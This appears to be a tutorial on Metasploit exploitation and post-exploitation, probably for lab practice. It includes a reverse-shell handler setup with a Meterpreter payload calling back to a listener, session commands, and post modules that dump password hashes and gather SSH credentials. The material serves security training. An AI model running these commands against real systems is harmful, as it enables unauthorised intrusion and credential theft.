After identifying a vulnerable service, exploitation involves using an exploit module to gain control of the target system. Once access is gained (usually via a payload), post-exploitation begins — where the attacker explores the system, gathers data, and tries to maintain access.
Exploitation Workflow
You start by selecting an exploit and pairing it with a suitable payload. This often involves setting options like target IP, port, and local host for the callback connection.
use exploit/multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 10.10.14.8
set LPORT 4444
runAlternatively, use:
exploitBoth run and exploit work, but exploit is more common and readable.
Useful Commands in Exploitation
show exploits— List available exploit modulesshow payloads— View compatible payloads for the chosen exploitset payload <payload>— Set the desired payloadshow options— View required settings before launchinginfo— See detailed information about the selected module
Sessions Management
After a successful exploit, a session is created — often a Meterpreter or regular shell session.
sessions # List all current sessions
sessions -i 1 # Interact with session 1
background # Background an active sessionSessions must often be active to use post-exploitation modules.
Post-Exploitation Overview
Once you have a session, post-exploitation lets you:
- Enumerate the system and environment
- Extract credentials or sensitive data
- Escalate privileges
- Maintain access or pivot to other systems
You use post modules such as the ones under:
post/linux/gather/
post/linux/manage/
post/multi/gather/
Running a Post Module
Steps to run a post-exploitation module:
use post/linux/gather/hashdump
set SESSION 1
runYou must set a valid SESSION. Check current ones with:
sessionsTo get full module info and requirements:
info
show optionsExample Modules
These modules are commonly used after exploitation:
post/linux/gather/hashdump— Dump password hashespost/linux/manage/printenv— Show environment variablespost/linux/gather/checkvm— Detect virtual machinespost/multi/gather/ssh_creds— Search for SSH keys or configs
Search them by type or platform:
search type:post platform:linux
search gather